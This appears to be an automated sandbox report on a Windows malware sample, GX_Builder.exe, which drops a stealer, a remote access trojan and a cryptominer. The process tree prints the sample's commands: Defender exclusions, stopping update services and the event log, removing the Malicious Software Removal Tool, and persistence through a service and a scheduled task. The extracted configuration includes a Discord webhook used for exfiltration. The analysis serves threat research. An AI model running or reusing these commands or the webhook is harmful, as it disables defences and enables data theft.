Analysis
-
max time kernel
93s -
max time network
82s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
22-02-2024 18:03
General
-
Target
GX_Builder.exe
-
Size
12.9MB
-
MD5
de6416915830c63685b6771684689d36
-
SHA1
f3516b1816295056c870e3c15a52aafbf4e9aab3
-
SHA256
965e26ab119bb1fe78e0f2e9f3a4b85de6b308100faa6c12dd6aa60ee52f42ef
-
SHA512
7efb6ba401dad084f2e7aa0af834171724168f2bd28da2d28fd3c1083b6286b262f352fe6dac703eacb5624f8b810918293d563353dafd85ac96532da61f25a7
-
SSDEEP
393216:oNOnxeqv5yEgPDflLNVga2D3o5Doo7Mm:0OnxD56DtLzGD3ohoo7Mm
Malware Config
Extracted
growtopia
https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj
Signatures
-
Detect ZGRat V1 8 IoCs
-
Growtopia
Growtopa is an opensource modular stealer written in C#.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 9 IoCs
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 9 IoCs
-
Loads dropped DLL 11 IoCs
-
UPX packed file 14 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Detects Pyinstaller 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 47 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of WriteProcessMemory 55 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\GX_Builder.exe"C:\Users\Admin\AppData\Local\Temp\GX_Builder.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAeQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAeAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAcQBsACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GMDTJRUT"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GMDTJRUT"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB71F.tmp" /F4⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"C:\Users\Admin\AppData\Local\Temp\KeyGeneratorTOP.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exeC:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.4MB
MD58d7200de17bba6125eff6ea47524fd86
SHA1e1a45ee72878b3fdd1a3d3858dffcdd9067985c6
SHA2560613c187041486e213deefff3e0d004b5261ad506020c34ea507659501433a0a
SHA512dcaeb22f599e0f7e1754955fa095921370e47f05eb8836f70776dcf303b998d1e07da453fe3b8c6df8f8dbd507f8e5dd057cc54eaf11ea53c069f898756484d1
-
Filesize
1.6MB
MD55c293c1035cad3f8a85305b2a9177309
SHA1ad6c6ca256f5b678cb2b6067222b153465b98240
SHA25637b41d250019d599087c0e441f96238f92f425ed663a3e931aa0114541f3cb22
SHA5124e6976f0c747dd7bd6f770279f942fe4141e1d6f103f8b33684baad59a8feb19eed1a01decde6f9ff2944ba3536addcf15a5190773ad8e8bdf3c784886d427ab
-
Filesize
6.6MB
MD5d06e937eba4314100056574b769ea048
SHA18b2cb85244d9737c6033ff571b98976d2feb6c9a
SHA2562dea69b0d5107322c31b236ed52c82f580de1df18d9fbea732123efdaaa60112
SHA512367fc0ed156d1a95c337ff0f145ebeb142e38e61022496b2df310320baa709eeb308ad8d81711ede5d966c23d920f58a53979f4512b1f83f7eab21504a199d57
-
Filesize
6.4MB
MD50dcce34e219836279c54451e3c02da4f
SHA1b713c2738407b2fa372c37f5ab40cbf52aa817d1
SHA256485d6ad49fbd8301402c61124caa15d69402f484248594b7a8d3bcb64045002b
SHA512695714362e8dcbb2b0c2be8f7f1b2276b85953a7c6c6c12d336c1b81b111833102377d8d1163dea4844751a06e8339a7d6e04cf945806db134a9904e24440ff0
-
Filesize
6.9MB
MD5bd0e4823fbfed11abb6994db7d0e6c09
SHA18694f5a67686070fc81445edebef8ead6c38aca8
SHA256a83dc0d4764f8e41e061dd4e331f341b09cc994fc339fed2445692df7b98affe
SHA51237f7e77407571c8f4ac298a4580610b0787e7cf8c8993e6816895a1caa71e0c4d97b72f525b9f054071fbf14bf9e87c48c67b39dcc01448213a995d036ff84e0
-
Filesize
5.0MB
MD5e222309197c5e633aa8e294ba4bdcd29
SHA152b3f89a3d2262bf603628093f6d1e71d9cc3820
SHA256047a7ca1b8848c1c0e3c0fcc6ece056390760b24580f27f6966b86b0c2a1042b
SHA5129eb37686e0cee9ec18d12a4edd37c8334d26650c74eae5b30231c2b0db1628d52848123c9348c3da306ec950b827ec0a56cdf43ee325a9e280022c68193d8503
-
Filesize
6.7MB
MD548ebfefa21b480a9b0dbfc3364e1d066
SHA1b44a3a9b8c585b30897ddc2e4249dfcfd07b700a
SHA2560cc4e557972488eb99ea4aeb3d29f3ade974ef3bcd47c211911489a189a0b6f2
SHA5124e6194f1c55b82ee41743b35d749f5d92a955b219decacf9f1396d983e0f92ae02089c7f84a2b8296a3062afa3f9c220da9b7cd9ed01b3315ea4a953b4ecc6ce
-
Filesize
1KB
MD57f673f709ab0e7278e38f0fd8e745cd4
SHA1ac504108a274b7051e3b477bcd51c9d1a4a01c2c
SHA256da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4
SHA512e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132
-
Filesize
3.6MB
MD53480130083af1746b8b6e4071fb0b5ee
SHA1afce40fe39463c0dc56c82b4781c7e160df17d23
SHA256da01f392254b5bc24034dd2d92357a49a2eae21bb296720a6a822ba3119e0fe9
SHA5128b7768dcc7593d01d8d6ee7385db46b11cdf488b6d4c4b1e35256b920bf9bcbd8c689c097f84062dd27fcb3c093c3ec9c4092991dbb6750d18c26c1ab4386ffa
-
Filesize
3.1MB
MD573d31366771da793824b6caea0579162
SHA1140f982ab118dea79c008abe2adc22cac7743577
SHA256d6f0d3c97e60a52778c06112d0e148de711130a8f1f488eb083f0d0544f4b267
SHA512de50a70c97bb15a55cce1ad672b23c4403224891cc1d133bad93bd9b2a9a06134f2cdfa69829825dbabb0e34e858d1dbd3281cca81e154a2afd0792418f6f82a
-
Filesize
191KB
MD5e004a568b841c74855f1a8a5d43096c7
SHA1b90fd74593ae9b5a48cb165b6d7602507e1aeca4
SHA256d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db
SHA512402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af
-
Filesize
6.8MB
MD5c083946065d83c686551acda76f75314
SHA1d5c61fb8fce5e2e4227eb44483ed239cc75bff06
SHA2569dfe5d2dc9ca50329bdcf8fece66e06ad9ea7de540c87bdced245da20cc5be27
SHA5125d7935b789ac5269396525e0a4ef4586a4b60abaa507f68d114904aab3a5db1548070e6b1c36a445d7e8bb444a83b121d135a23c604354929cb2200019d00afb
-
Filesize
5.8MB
MD592629db7fdc1863858b2c818f614676a
SHA18ab043bec7904ac999415a7b4e05f7d74816834b
SHA25636b46bafb690f490cd11da8542eaa74ce740f5de379859e063ba43bca02862e5
SHA5124ae82bca3fabcb5a5bd7f6b4a9a91de6b188300626ed0b35b22e20c843887c7ae134c0cb5b9b627f2cfd930544b2a638c1cd5bcba26f10db5826fc7da2c7c2a0
-
Filesize
316KB
MD5675d9e9ab252981f2f919cf914d9681d
SHA17485f5c9da283475136df7fa8b62756efbb5dd17
SHA2560f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d
SHA5129dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb
-
Filesize
42KB
MD5d499e979a50c958f1a67f0e2a28af43d
SHA11e5fa0824554c31f19ce01a51edb9bed86f67cf0
SHA256bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e
SHA512668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
9.6MB
-
Filesize
412KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
12KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
512KB
-
Filesize
336KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
6.9MB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
404KB
-
Filesize
256KB
-
Filesize
404KB
-
Filesize
256KB
-
Filesize
432KB
-
Filesize
6.9MB
-
Filesize
216KB